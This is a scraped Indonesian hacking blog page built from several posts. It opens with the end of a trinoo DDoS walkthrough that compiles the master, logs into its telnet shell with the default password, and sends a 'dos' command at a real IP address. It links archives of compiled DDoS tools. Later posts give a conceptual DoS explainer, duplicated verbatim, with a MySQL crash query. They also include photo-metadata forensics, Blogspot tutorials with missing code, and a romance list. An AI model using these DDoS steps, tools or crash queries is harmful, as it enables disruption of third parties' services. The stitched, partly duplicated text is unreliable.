http://yoyoparty.com/upload/ mywisdom@trin00-king~#make gcc -o master master.c blowfish.c -lcrypt blowfish.c: In function 'blowfish_init': blowfish.c:131: warning: incompatible implicit declaration of built-in function 'strncpy' blowfish.c: In function 'encrypt_string': blowfish.c:192: warning: incompatible implicit declaration of built-in function 'strlen' blowfish.c:194: warning: incompatible implicit declaration of built-in function 'strcpy' blowfish.c: In function 'decrypt_string': blowfish.c:232: warning: incompatible implicit declaration of built-in function 'strlen' blowfish.c:234: warning: incompatible implicit declaration of built-in function 'strcpy' strip master mywisdom@trin00-king~#./master ??
ok instalasi trinoo master di x.x.x.x selesai,selanjutnya untuk mengakses trinoo shell dari localhost attacker :
Code:
mywisdom@trin00-king~#telnet x.x.x.x 27665 Trying x.x.x.x... Connected to hostxxxxxxxx. Escape character is '^]'. betaalmostdone trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]   trinoo>
Dalam contoh ini saya menggunakan password default:
betaalmostdone

untuk memerintahkan master slave melakukan ddos ketikkan perintah : dos alamat_ip_target
Code:
trinoo> dos 74.63.241.86 DoS: Packeting 74.63.241.86. trinoo>
Ok untuk sementara sekian dulu dan terima kasih

aneka compiled tool ddos bisa didownload di
http://yoyoparty.com/upload/ddos_tools.tgz
dan
http://yoyoparty.com/upload/compiled_ddos2.tgz

regards
mywisdom
thanks:
devilzc0de crews and members. ycl crews and members, jasakom crews and members

Read more

cara mengetahui Keaslian sebuah Foto (photo)

Posted in
by DareDeviL


Just For Educational Purposes Only

Seiring dengan kemajuan di bidang multimedia, tak lepas dari kenyataan adanya isu-isu gambar palsu di internet. Hal ini membuat orang awam yang kurang tahu, akan benar-benar tertipu. Lantas, bagaimana membedakan antara gambar palsu atau tidak?

Di dalam bidang keamanan cyber, ilmu ini sengaja diciptakan untuk menangani berbagai macam persoalan terkait dengan dunia Digital, yang salah satu kasus nya telah saya sebutkan diatas. Catatan ini dibuat karena banyaknya permintaan untuk menjelaskan contoh dari catatan saya sebelumnya mengenai Restricted Area: Digital Forensic ( Reuse, Reduce, n Recovery Data di FD atau HDD)

So ...
Let's Play ,.

Metode: Dengan memanfaatkan metadata. Pada dasarnya, metadata adalah data dalam file yang dibuat untuk keperluan manajemen. Untuk jenis data gambar (image), metadata mengandung informasi mengenai siapa pemotretnya, kapan pemotretannya, dan setting kamera pada saat dilakukan pemotretan, dll.

Tools: http://impulseadventure.com/photo/jpeg-snoop.html
Namun, untuk lengkapnya bisa anda dapatkan di catatan mengenai: Restricted Area: Digital Forensic (Reuse, Reduce, n Recovery Data di FD atau HDD) khusunya pada bagian Tools Analisa Data.

@----------------------------------------------------------------------------------------------------------------------@

Ada 2 buah gambar yang akan dibuktikan. ( saya sengaja mengambil contoh gambar yang telah diedit sebelumnya dengan Photoshop CS 4 )

ASLI




♥ 3 Serangkai ♥



Pada data diatas (Yang berwarna kuning), terlihat jelas mengenai Jenis Kamera yang digunakan adalah Camera Sony dengan EXIF Model secara Cybershot U

PALSU



Edited By 1




Pada data diatas terlihat jelas mengenai jenis software yaitu; Adobe Phothoshop CS4 Windows, dengan Kualitas menyimpan gambar 12, dan mode IRB nya telah teridentifikasi juga sebagai Phothoshop.

So,.
Bagaimana dengan gambar hantu di atas. Gambar tersebut saya dapatkan dari salah satu thread di forum kapanlagi.com. ( Pada ribut-ribut mikirin foto itu asli apa enggak ,. lol )
berikut hasil analisa metadatanya:



dari metadata tersebut didapatkan bahwa foto tersebut palsu. Foto tersebut telah diedit dengan Adobe Photoshop, yang jelas sekali mode IRB Photoshop teridentifikasi disana.

jadi jika kamu melihat foto yang janggal buat kalian, sebaiknya jangan langsung percaya, kudu di teliti dulu tuh bank, biar jelas asli atau palsunya tuh foto

Read more

mau tau siapa pemilik IP dan website

Posted in 17 October 2010
by DareDeviL

mau tau Basic Hacking Tools adalah sebuah web yang menampilkan data tentang Ip dan lokasi sebuah IP atu WEB, info lebih lanjut klik disini

Read more

belajar hacking dengan DOS

Posted in
by DareDeviL

Dalam artikel ini saya akan menjelaskan mengenai jenis serangan yang bisa dikatakan tidak ada obatnya, yaitu denial of service atau DoS. Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti twitter.com dan metasploit.com.

Apa itu DoS

Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.

Secara umum ada 2 cara melakukan serangan DoS :

1. Mematikan Server
2. Menyibukkan Server
  • Tanpa bug/vulnerability
  • Meng-exploit bug/vulnerability

DoS dengan Mematikan Server: Kill Them!

Anda pernah mengalami ingin memakai telepon umum atau ATM namun tidak bisa karena di mesin tersebut ditempel kertas berisi pesan “Out of Service” atau “Sedang dalam perbaikan”. Telepon umum adalah target serangan DoS yang biasa terjadi, dimana-mana kita menemukan telpon umum yang rusak karena serangan DoS seperti membanting gagang telpon, mencabut kabel, memecahkan LCD dan aksi-aksi lainnya.

Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.

Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.

Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:

* Ping of Death ( CA-1996-26 )

Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.
* MySQL IF Query DoS ( SA25188 )

Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.

* Cisco Global Site Selector DNS Request Denial of Service (SA33429)

Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.

Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.

DoS dengan Menyibukkan Server: Make Them As Busy As Possible!

Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit. Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.

Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.

DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan :
  1. Exploiting vulnerability: Menyerang dengan malicious request/packet
  2. No vulnerability exploitation: Menyerang dengan normal request/packet
Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.

Make Server Busy by Exploiting Vulnerability

Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.

Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.

Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:

* TCP SYN Flood DoS

Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.

Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.
* Apache mod_deflate DoS

Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.

Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.

Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.

Make Server Busy Without Exploiting Vulnerability

Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.

Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).

Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.

Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.

Kesimpulan

Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:

* Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.
* Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.
o Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.
o Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.

Read more

belajar hacking dengan DOS

Posted in
by DareDeviL

Dalam artikel ini saya akan menjelaskan mengenai jenis serangan yang bisa dikatakan tidak ada obatnya, yaitu denial of service atau DoS. Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti twitter.com dan metasploit.com.

Apa itu DoS

Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.

Secara umum ada 2 cara melakukan serangan DoS :

1. Mematikan Server
2. Menyibukkan Server
  • Tanpa bug/vulnerability
  • Meng-exploit bug/vulnerability

DoS dengan Mematikan Server: Kill Them!

Anda pernah mengalami ingin memakai telepon umum atau ATM namun tidak bisa karena di mesin tersebut ditempel kertas berisi pesan “Out of Service” atau “Sedang dalam perbaikan”. Telepon umum adalah target serangan DoS yang biasa terjadi, dimana-mana kita menemukan telpon umum yang rusak karena serangan DoS seperti membanting gagang telpon, mencabut kabel, memecahkan LCD dan aksi-aksi lainnya.

Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.

Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.

Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:

* Ping of Death ( CA-1996-26 )

Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.
* MySQL IF Query DoS ( SA25188 )

Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.

* Cisco Global Site Selector DNS Request Denial of Service (SA33429)

Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.

Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.

DoS dengan Menyibukkan Server: Make Them As Busy As Possible!

Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit. Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.

Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.

DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan :
  1. Exploiting vulnerability: Menyerang dengan malicious request/packet
  2. No vulnerability exploitation: Menyerang dengan normal request/packet
Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.

Make Server Busy by Exploiting Vulnerability

Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.

Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.

Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:

* TCP SYN Flood DoS

Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.

Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.
* Apache mod_deflate DoS

Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.

Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.

Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.

Make Server Busy Without Exploiting Vulnerability

Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.

Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).

Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.

Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.

Kesimpulan

Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:

* Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.
* Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.
o Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.
o Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.

Read more

Cara Membuat Menu di Blogspot dengan List-O-Matic

Posted in
by DareDeviL

Banyak yang nanyain cara bikin menu seperti yang aku pake di blog ini. Untuk blogspot, sebelum membuat menu, halaman yang akan di link sebaiknya di buat dulu dari postingan biasa, karena di blogspot tidak ada fasilitas membuat halaman, yang ada hanya membuat postingan. jadi menu kita nantinya akan di link ke postingan yang udah kita buat.

Misalnya kamu ingin membuat menu Depan, Tentang, dan Portofolio. maka kamu harus membuat postingan dengan Judul/Title: Depan, Tentang, dan Portofolio, dengan demikian kita akan mempunya 3 halaman dengan url http://nama.blogspot.com/depan.html, http://nama.blogspot.com/tentang.html dan http://nama.blogspot.com/portofolio.html.


Selanjutnya ikuti langkah-langkah pembuatan menu secara otomatis menggunakan List-O-Matic. Setelah semua langkah di lakukan, kamu akan di beri 2 jenis kode yaitu HTML dan CSS.

Copy kode HTML dan masukkan lewat Add a Page ElementHTML/JavaScript dan letakkan dimana kamu pengen menunya muncul.

Here is the CSS for this list:

#navlist ul
{
margin-left: 0;
padding-left: 0;
white-space: nowrap;
}
#navlist li
{
display: inline;
list-style-type: none;
}
#navlist a { padding: 3px 10px; }
#navlist a:link, #navlist a:visited
{
color: #fff;
background-color: #036;
text-decoration: none;
}
#navlist a:hover
{
color: #fff;
background-color: #369;
text-decoration: none;
}


Sedangkan untuk kode CSS harus di copy dan di letakkan dalam kode template. Di halaman template blog kamu, pilih Edit HTML, letakkan kode CSS dari List-O-Matic tadi sebelum kode]]>

Selamat Mencoba !

Read more

21 Tanda orang yang benar-benar mencintaimu

Posted in
by DareDeviL

1. Orang yang mencintai kamu tidak pernah mampu memberikan alasan kenapa dia mencintai kamu. Yang dia tahu di hati dan matanya hanya ada kamu satu-satunya, dan dia akan selalu bahagia jika melihat kamu bahagia.


2. Walaupun kamu sudah memiliki teman istimewa atau kekasih, dia tidak perduli! Baginya yang penting kamu bahagia dan kamu tetap menjadi impiannya.

3. Orang yang mencintai kamu selalu menerima kamu apa adanya, di hati dan matanya kamu selalu yang tercantik walaupun kamu merasa berat badan kamu sudah bertambah.

4. Orang yang mencintai kamu selalu ingin tau tentang apa saja yang kamu lalui sepanjang hari ini, dia ingin tau kegiatan kamu.

5. Orang yang mencintai kamu akan mengirimkan SMS/YM/BBM seperti ’selamat pagi’, ’have fun’, ’selamat tidur’, ‘take care’, dan lain-lain, walaupun kamu tidak membalas SMS-nya, karena dengan kiriman SMS itu lah dia menyatakan cintanya, menyatakan dengan cara yang berbeda, bukan “aku CINTA padamu”.

6. Jika kamu merayakan tahun baru dan kamu tidak mengundangnya ke pesta yang kamu adakan, setidak-tidaknya dia akan menelefon untuk mengucapkan selamat atau mengirim SMS/YM/BBM.

7. Orang yang mencintai kamu akan selalu mengingat setiap kejadian yang dia lalui bersama kamu, bahkan mungkin kejadian yang kamu sendiri sudah melupakannya, karena saat-saat itu adalah saat yang berharga untuknya. dan saat itu matanya pasti berkaca, karena saat bersamamu tidak selalu terulang.

8. Orang yang mencintai kamu selalu mengingat setiap kata-kata yang kamu ucapkan, bahkan mungkin kata-kata yang kamu sendiri lupa pernah mengungkapkannya. karena dia menyematkan kata-kata mu di hatinya, berapa banyak kata-kata penuh harapan yang kau tuturkan padanya, dan akhirnya kau musnahkan? pasti kau lupa, tetapi bukan orang yang mencintai kamu.

9. Orang yang mencintai kamu akan belajar menggemari lagu-lagu kegemaran kamu, karena dia ingin tahu apa kegemaran kamu. Kesukaan kamu kesukaannya juga, walaupun susah menggemari kesukaan kamu, tapi akhirnya dia bisa.

10. Kalau kamu sedang sakit, dia akan sentiasa mengirim SMS, menelefon, YM/BBM dll untuk bertanya keadaan kamu - karena dia khawatir tentang kamu, peduli tentang kamu.

11. Jika kamu mengatakan akan menghadapi ujian, dia akan menanyakan kapan ujian itu berlangsung, dan saat harinya tiba dia akan mengirimkan SMS/YM/BBM ‘good luck’ untuk memberi semangat kepada kamu.

12. Orang yang mencintai kamu akan memberikan suatu barang miliknya yang mungkin buat kamu itu sesuatu yang biasa, tetapi baginya barang itu sangat istimewa.

13. Orang yang mencintai kamu akan terdiam sesaat, ketika sedang bercakap di telefon dengan kamu, sehingga kamu menjadi bingung. Sebenarnya saat itu dia merasa sangat gugup karena kamu telah menggetarkan dunianya.

14. Orang yang mencintai kamu selalu ingin berada di dekat kamu dan ingin menghabiskan hari-harinya hanya dengan kamu.

15. Orang yang mencintai kamu bertindak lebih seperti saudara daripada seperti seorang kekasih.

16. Orang yang mencintai kamu sering melakukan hal-hal yang bikin BETE, seperti menelefon/SMS/YM/BBM kamu 100 kali sehari. Atau mengejutkan kamu di tengah malam dengan mengirim SMS. Sebenarnya ketika itu dia sedang memikirkan kamu.

17. Orang yang mencintai kamu kadang-kadang merindukan kamu dan melakukan hal-hal yang membuat kamu pening. Namun ketika kamu mengatakan tindakannya itu membuat kamu terganggu dia akan minta maaf dan tak akan melakukannya lagi.

18. Jika kamu memintanya untuk mengajarimu sesuatu maka ia akan mengajarimu dgn sabar. Bahkan dia begitu gembira karena dapat membantu kamu. dia tidak pernah mengelak dari memenuhi permintaan kamu walau sesulit apapun permintaan itu.

19. Kalau kamu melihat handphone-nya maka nama kamu akan menghiasi sebagian besar INBOX-nya. Dia masih menyimpan SMS-SMS dari kamu walaupun ia kamu kirim berbulan-bulan atau bertahun-tahun yang lalu.

20. Dan jika kamu coba menjauhkan diri darinya atau memberi reaksi menolaknya, dia akan menyadarinya dan menghilang dari kehidupan kamu, walaupun hal itu membunuh hatinya.

21. Jika suatu saat kamu merindukannya dan ingin memberinya kesempatan dia akan ada menunggu kamu karena sebenarnya dia tak pernah mencari orang lain. Dia sentiasa menunggu kamu.

22. Orang yang begitu mencintaimu, tidak pernah memaksa kamu memberinya sebab dan alasan, walaupun hatinya meronta ingin mengetahui, karena dia tidak mau kamu terbebani karenanya. saat kau pinta dia pergi, dia pergi tanpa menyalahkan kamu, karena dia benar-benar mengerti apa itu cinta.

Read more

buat kotak komentar di blogspot

Posted in
by DareDeviL

Mungkin masih banyak blog pada layanan blogspot yang menampilkan kolom komentarnya dengan pop-up windows ataupun dengan tampilan halaman baru. Ini menyulitkan para komentator untuk kembali ke konten blog tersebut, sehingga setelah komen sebuah postingan, dia gak liat postingan lainnya juga konten lain pada blog kita.

Buat yang menginginkan kolom komentarnya berada tepat dibawah postingan, berikut beberapa cara yang bisa ditempuh untuk menampilkan kolom komentar dibawah postingan anda.

Pertama ya lewat menu yang disediakan oleh blogger, dashboard kemudian setting lalu menuju comment, pada kolom Comment Form Placement, kita pilih Embedded below post. lihat gambar:

Gambar 01

Gambar 01

Jika cara tersebut tidak bisa, maka kemungkinan template anda tidak support untuk menampilkan kolom komentar tepat dibawah postingan maka, anda perlu menuju halaman Layout lalu ke Edit Html. Coba temukan kode berikut ini:


Temukan Kode di atas [untuk firefox tekan Ctrl + F aja] ambil sebagian kode, karna kemungkinan ada perbedaan sedikit. Sebagai contoh coba search kata ini:

pada akhir script. Setelah anda teliti dan menemukan keseluruhan script seperti di atas, replace dengan kode berikut:

Jika tidak menemukan juga, artinya template anda termasuk template jelek abis keren. jangan menyerah!! Banyak jalan menuju roma, masih ada cara lain, cari lagi kode berikut:

Ingat! masih seperti sebelumnya, searchnya jangan semua dicopy, gak semua template sama persis. Klo udah dapet, dibawahnya letakkan kode berikut:

